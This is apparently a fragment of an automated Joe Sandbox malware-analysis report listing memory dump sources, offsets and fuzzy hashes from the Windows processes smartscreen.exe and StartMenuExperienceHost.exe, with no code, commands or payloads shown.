                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b791000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: I
                                                          • API String ID: 0-3707901625
                                                          • Opcode ID: 272c6c2c47a8360e666b875b46ea72ae7de09cef4e002903099fd3742095893f
                                                          • Instruction ID: 1bb6b64e9681585670e723d8bf27ecff32eaf032831eba9f54921cc459e18318
                                                          • Opcode Fuzzy Hash: 272c6c2c47a8360e666b875b46ea72ae7de09cef4e002903099fd3742095893f
                                                          • Instruction Fuzzy Hash: ADE01A6154E3C48FCB06EB7488698553F70AE6721078B41DED049CF1B3E62D8A49CB01
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b770000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e6f74f0258649127d26eaa5c31e327b1eda42e34f1d6d907fb4a124580a58925
                                                          • Instruction ID: 0b23bc242a375c0cd2a0c8045667b1ea0cac3ac874a2f5fec58268b1800ad54e
                                                          • Opcode Fuzzy Hash: e6f74f0258649127d26eaa5c31e327b1eda42e34f1d6d907fb4a124580a58925
                                                          • Instruction Fuzzy Hash: 8552D771B19A4E4FEBA8EB5884A56B873D2FF58300F0506BAD01DC36E7DD24BD818781
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b791000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7b8c873ec0d4bb8cdf569eca7b111d06ef1bc4cafc868eae3d22b58df577dc32
                                                          • Instruction ID: 187f0f01c116434b538f3693ddf4b2e8846788cccb28e3504a30f683510cdc26
                                                          • Opcode Fuzzy Hash: 7b8c873ec0d4bb8cdf569eca7b111d06ef1bc4cafc868eae3d22b58df577dc32
                                                          • Instruction Fuzzy Hash: D321C81BB0F2A64AEB2576BD68B14F93B50DF5123670843F3E19C8E0F3DD0C224A8661
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b770000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c2a19df6a02ae9ec2fc6603861f7ad7c8679519fbe6c6ad5ae864c81224e08ee
                                                          • Instruction ID: ad531eff7853898dba220237752f32cc392c7db07eee15251a654fac871b33b6
                                                          • Opcode Fuzzy Hash: c2a19df6a02ae9ec2fc6603861f7ad7c8679519fbe6c6ad5ae864c81224e08ee
                                                          • Instruction Fuzzy Hash: 9D42B671B19A4E8FEBA8EB5884A57B873D2FF58300F1506B9D00DC36A6DD34BD858781
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b770000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fce47e74771afa2f0b05a9cb19c8d2b95127d7d8b294c1e7ffbabaf900eaa7bb
                                                          • Instruction ID: 5df17786a0f0af1edc90e03febec77f5f6cae26e077483ea01f04583988c5733
                                                          • Opcode Fuzzy Hash: fce47e74771afa2f0b05a9cb19c8d2b95127d7d8b294c1e7ffbabaf900eaa7bb
                                                          • Instruction Fuzzy Hash: B5D1F771B19A4E8FEBA8EB5884A56B873D2FF58300F4506BAD04EC35F7DD24B9818741
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b770000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b05d5135b6edf7764add3f7fa3589e64f1440db90f9c3215236053637fb7febe
                                                          • Instruction ID: c18805cb2bb4ec08faab3a67388b92b2c131d35581f7bcab0c86d8b98424112f
                                                          • Opcode Fuzzy Hash: b05d5135b6edf7764add3f7fa3589e64f1440db90f9c3215236053637fb7febe
                                                          • Instruction Fuzzy Hash: 5BD1D621B1AA1D4FEBACEA6C84A577433E2EF54300F550676D44EC76F2EE64BE818341
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B784000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B784000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b784000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 275f0874c2791c16ffcd5764380cd54a9024e130fb60e0660c3b7f30bf9385c3
                                                          • Instruction ID: d10d82013ae94402a10834c7e915ec82d265a0536134d11b6983b4414e0f9620
                                                          • Opcode Fuzzy Hash: 275f0874c2791c16ffcd5764380cd54a9024e130fb60e0660c3b7f30bf9385c3
                                                          • Instruction Fuzzy Hash: 8AA1B570B1890D4FDB58EB68C4A96B977E2FF98304B5106BAE01DC72E6DE35A842C741
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b791000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 198edc141a9e1f5da93ef302fad4a7cffec93c41f6e363a3f746a0b80b704ff4
                                                          • Instruction ID: 541935b413ac9023e0416ab681721662e700c4499d5ad67d57ebea28a5ddb433
                                                          • Opcode Fuzzy Hash: 198edc141a9e1f5da93ef302fad4a7cffec93c41f6e363a3f746a0b80b704ff4
                                                          • Instruction Fuzzy Hash: 71910761B1DA4E0FEB9CEB6844766B873D2EF94300F4542BAD40DC72E7DD286D458391
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b791000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3d53976ffad9d2149b1c176543a89a18b6653dad3ae34b0231837d7e11a6485e
                                                          • Instruction ID: 7b40edb5c5472133eb730426f233b6942f7cea50a193fb24de8555ca6b793cc5
                                                          • Opcode Fuzzy Hash: 3d53976ffad9d2149b1c176543a89a18b6653dad3ae34b0231837d7e11a6485e
                                                          • Instruction Fuzzy Hash: FB514770A19A5D8FEB98EF98C865BECB7E1FF54340F1042B6D01DD32A6DE3469848B41
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b760000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: dfa560b8674232b036245963f28da186a8f4c138d6b1b6fd382aa6a4ebc34706
                                                          • Instruction ID: 316e101ef78cfc286dd9bf9213776a60613c7b2364f351c9a1e9e6bd985e6ad7
                                                          • Opcode Fuzzy Hash: dfa560b8674232b036245963f28da186a8f4c138d6b1b6fd382aa6a4ebc34706
                                                          • Instruction Fuzzy Hash: 6F21EA3130DD184FE768EA5CE889EB977D1EF9932171501BAE58EC7135E911EC8287C2
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b791000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d3e5697d92d831851b0c404da935dffe1d13e18def46b9ecc965194742255821
                                                          • Instruction ID: 4dbcc223690bca2cadb859f0527fef4822aea533af61e0d079ae5e2a716e79d2
                                                          • Opcode Fuzzy Hash: d3e5697d92d831851b0c404da935dffe1d13e18def46b9ecc965194742255821
                                                          • Instruction Fuzzy Hash: 43F01C70E1861D8EEBA8DF59C882AACB7B0FB64340F654169D459D3265CA34A5468F80
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b791000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 60e02ad3df73ae645880ed4de11b2b4d95edd1e9e69e6df9f56ec2e3d91379c2
                                                          • Instruction ID: 206070f4f76dd8aec91febe2a0b093977a54fd6e0732ecad5da23d8e4b0df8d2
                                                          • Opcode Fuzzy Hash: 60e02ad3df73ae645880ed4de11b2b4d95edd1e9e69e6df9f56ec2e3d91379c2
                                                          • Instruction Fuzzy Hash: 0EE04F30A1AB844FC70A9B2888699503BB0EF6B21178A40EBD449CB1B3D62DD848C712
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b791000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c0314b6be8dde890c1bbab9c0cc29e2b80965f8c3cce8f098a596a8cc3aba0eb
                                                          • Instruction ID: d5f71805f2d3b956d4049ee78b74e4c4af5d1ee39bf8f3acbeecfbc5eef2f748
                                                          • Opcode Fuzzy Hash: c0314b6be8dde890c1bbab9c0cc29e2b80965f8c3cce8f098a596a8cc3aba0eb
                                                          • Instruction Fuzzy Hash: 22E04F21A4A7C00FC30A663488698543BB1DF6721174A01D7D045CB5B3D51DDC4DC711
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b791000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9cf57cbc6f25681e89472532ded9f7eaeff93bd1b0f022a93c0a50ebe794988e
                                                          • Instruction ID: 3b0d5e8abd0ce2ca53a3bebe35a471ec98e7700fcc6ceb072126859dd7a35095
                                                          • Opcode Fuzzy Hash: 9cf57cbc6f25681e89472532ded9f7eaeff93bd1b0f022a93c0a50ebe794988e
                                                          • Instruction Fuzzy Hash: 4CE04F34A8D7804FC70A9B3888698503BB1EF5721174A80FFD045CF1B3DA2D9849C752
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b791000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                          • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                          • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                          • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b791000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                          • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                          • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                          • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b770000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b06007b2d15cb476c392cbbefce1be8c6ad90f5c39c0958316e5efeaf6a74b02
                                                          • Instruction ID: 70a7c9c01eaabe15e3348d8fe264090bb421f1a0ba5a649b504df77a46688067
                                                          • Opcode Fuzzy Hash: b06007b2d15cb476c392cbbefce1be8c6ad90f5c39c0958316e5efeaf6a74b02
                                                          • Instruction Fuzzy Hash: 6AE01A32B0970A8FF725AA94C4E4AA93245EB54310F064675D849D72F2EEA8AA0056C1
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b791000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ef3d8d036fab11cc71859aac51c511f020291b2c17e7915d4cbdb8d17a731c5b
                                                          • Instruction ID: f1fb9befa1aba3dcec86f37a9b6dbabc48013b5b22b7e1ee967b06db0b7b385b
                                                          • Opcode Fuzzy Hash: ef3d8d036fab11cc71859aac51c511f020291b2c17e7915d4cbdb8d17a731c5b
                                                          • Instruction Fuzzy Hash: 27E0123050A7844FC70A9B24C8A99903FB0EF2621178A01EBD409CF5B3DA1D9C49C751
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b791000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5dca4974807c69a72bb291b6a7fa4e74e6263f6fbdbfe6379304d645b69b7791
                                                          • Instruction ID: a063e363b410a398e15121942b096283b7afccf0c641f26452569facfd339e81
                                                          • Opcode Fuzzy Hash: 5dca4974807c69a72bb291b6a7fa4e74e6263f6fbdbfe6379304d645b69b7791
                                                          • Instruction Fuzzy Hash: 24E01A3194E7C04FC70B973488698507FA0AE1721078A45EAC085CF1B3E6198849C701
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b760000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 01128ebb3b7ec0b5151aa04a1c0580f2a8b486cc2299b51aaf45d3f3ed769e8f
                                                          • Instruction ID: 428e5cf728696dce690f4856f8b083968de8d78956b2ef141a538e12728ca06b
                                                          • Opcode Fuzzy Hash: 01128ebb3b7ec0b5151aa04a1c0580f2a8b486cc2299b51aaf45d3f3ed769e8f
                                                          • Instruction Fuzzy Hash: CDD0A930229A4E8FDA00B77CC88A8247BA0FB0F210FCA10E1E008C75B2E60888A98701
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b791000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                          • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                          • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                          • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b791000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 28d8733998a56753eaf3714d8c7a96fd320e2d6c2c6b6debb6d51310e0a97017
                                                          • Instruction ID: c4063fc3a21f7f5a6997ec60acdb5ad01519cf133be0afcd3963f33b0daf309b
                                                          • Opcode Fuzzy Hash: 28d8733998a56753eaf3714d8c7a96fd320e2d6c2c6b6debb6d51310e0a97017
                                                          • Instruction Fuzzy Hash: A2D01234B559044FC71CA638C89987473A1EB6A216B9541A9D00AC72B1D96ADD89C781
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b791000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7df4b55b0e60c0065be6ba464c6f623789a2d433318d44673c065b6b7d7e463f
                                                          • Instruction ID: ffa551e070a69a24c5ce1934b2239f7d7e8f5c3a6bdda62094c9b00d51ab11d4
                                                          • Opcode Fuzzy Hash: 7df4b55b0e60c0065be6ba464c6f623789a2d433318d44673c065b6b7d7e463f
                                                          • Instruction Fuzzy Hash: BBD01234B519044FC71CA638889A8747391EB6A21679551B9D00ACB2B1DA6ADD89C741
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b791000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f640deda8df11f8bf0bdc2187046cea7d3ea58240c40a11107efbf69b68f1ebc
                                                          • Instruction ID: 1f0d11c4e6c9b18eac84674918e6d4f79f6a7e9df8659f39aad3d9b155a22c34
                                                          • Opcode Fuzzy Hash: f640deda8df11f8bf0bdc2187046cea7d3ea58240c40a11107efbf69b68f1ebc
                                                          • Instruction Fuzzy Hash: F7D0A77594A5844FCB5A9735C8ACC507F50DF6B21435540ECC00A8F2B3D929CD49C700
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B784000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B784000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b784000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 104acc72f31d9d09c7afd7aed4cdc5b30d692872643904b6d98eec7ee4f3d1b7
                                                          • Instruction ID: e32e11cf29b9d40dace6209a03f093c1e76c0aae4cd824451ea8229c5322c9e2
                                                          • Opcode Fuzzy Hash: 104acc72f31d9d09c7afd7aed4cdc5b30d692872643904b6d98eec7ee4f3d1b7
                                                          • Instruction Fuzzy Hash: 0BC04C11A5A92F4EE5B872B934521E8B0409B49214B462AF9E41CD51A6DC4D5E9102C6
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b760000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5c1f25e0a95c736867b72634e4be5268a9db08ac9155d032615a6b6308ac3b74
                                                          • Instruction ID: 7aa13856ce0a2509d84b223f6b7d9800c3bd03e1d9bb254b1f2fc03e76ca40f3
                                                          • Opcode Fuzzy Hash: 5c1f25e0a95c736867b72634e4be5268a9db08ac9155d032615a6b6308ac3b74
                                                          • Instruction Fuzzy Hash: 66C08C00F1FB0F88E43931EE18A20ADB2004BD4A20FD30333C00E400B99C8E22C50147
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b760000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7a9572e19ec2e53a62397a4cbd0f0f3e4eaebf5a3901d0cb9667c88de8518723
                                                          • Instruction ID: e8b85f89a94c07da1bb42ab3636755a0317d01951f143e107b0e71ce8bd191f3
                                                          • Opcode Fuzzy Hash: 7a9572e19ec2e53a62397a4cbd0f0f3e4eaebf5a3901d0cb9667c88de8518723
                                                          • Instruction Fuzzy Hash: 29C08C305298088FC900E72DC88480432A0FB0D210BC20190E00EC7170E21A9C81C702
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b760000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fe1f07bad560b021fc5606da94808cc80d9bb50aaf5c47c17121d2f162821e36
                                                          • Instruction ID: 60a0e5e1c8d7b5a6b202f2686d5bc9aadee0aa8c3ef373c70128c864d5324f46
                                                          • Opcode Fuzzy Hash: fe1f07bad560b021fc5606da94808cc80d9bb50aaf5c47c17121d2f162821e36
                                                          • Instruction Fuzzy Hash: 33C08C3051190E8FC908EB28C88480433A0FB19200BC60090E009C7170E219DCC2C741
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b760000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8a38f57ed639fef3d88d11df78701187595349350ded237a282492a867519792
                                                          • Instruction ID: 9954da747b3cbc66ae4111696fbf3128a3121ce625bc8014a52c081f31b1a927
                                                          • Opcode Fuzzy Hash: 8a38f57ed639fef3d88d11df78701187595349350ded237a282492a867519792
                                                          • Instruction Fuzzy Hash: 7AB01200D67A0F44E42C31FA0C930A570405B45110FC20271D40C401B5988D12D40243
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b760000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a356a445c7444da277418655de0d64a20d14b7fd259fe8e1dcec3ab04cc465c1
                                                          • Instruction ID: 40b2424d629d52a5a1b661e9f1945f0f4cbe76ec9a5c50cdff945eeebb00e634
                                                          • Opcode Fuzzy Hash: a356a445c7444da277418655de0d64a20d14b7fd259fe8e1dcec3ab04cc465c1
                                                          • Instruction Fuzzy Hash: 2AB09226E1A31D8AE32892A0C4A02FE31520F54310F5AC6B2900F264F59C282B85A682
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.1852908237.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd9b760000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 5[_H
                                                          • API String ID: 0-3279724263
                                                          • Opcode ID: c1537ccfc4ef4853b2070f1b8a0a8cfc6deee2af4b399e1d880cdd69493ba448
                                                          • Instruction ID: 041b4791db096472e0875d719b480a338a9b8e08a8709b79e21e5cb7824646e5
                                                          • Instruction Fuzzy Hash: BD218270E1965E8EEB649BA4C8656BE7BB1FF50300F01067EC016D72E6DF786A018B40
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.1852908237.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd9b760000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 70ec809df8753c88d0a71ad22cfb0f6d31bd0d67752d974cdb032d1a8d59c643
                                                          • Instruction ID: 1dbbf18fa1e366e9070df38494e331f83b6631a81480d706dda4767c6e320f90
                                                          • Opcode Fuzzy Hash: 70ec809df8753c88d0a71ad22cfb0f6d31bd0d67752d974cdb032d1a8d59c643
                                                          • Instruction Fuzzy Hash: 89215021F19A1D8FE7B4E75884B56B87392FF84310F1602BAE40DD76F6EE286E414642
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.1852908237.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd9b791000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5c453e43267755cd7569c7a1ac1dbff5958a18778a1ba7ea93fd71c764d0d247
                                                          • Instruction ID: d6a9b087a721ce4fc41482c5e4881b593dc99fc0d5dec6fc0a3347c44bc19aa2
                                                          • Opcode Fuzzy Hash: 5c453e43267755cd7569c7a1ac1dbff5958a18778a1ba7ea93fd71c764d0d247
                                                          • Instruction Fuzzy Hash: 9E21C635B0D91E8FE7A9EB88C4647B873A1FB55310F050679D41DD72E5CD287D408781
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.1852908237.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd9b760000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c08e697d6d3f0f4a3fd672b7ace70df51db92ff098fffef24da5f037cbfb40b4
                                                          • Instruction ID: 2333a3632c13e29ca4a41461a8d5f78f5af289510d0381039ab4f1a408c2b53f
                                                          • Opcode Fuzzy Hash: c08e697d6d3f0f4a3fd672b7ace70df51db92ff098fffef24da5f037cbfb40b4
                                                          • Instruction Fuzzy Hash: C1115730A08A0DCFDB69DB48C454BAD73E1FB68300F5142A9D04ED32B5DA34AA808B45
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.1852908237.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd9b760000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
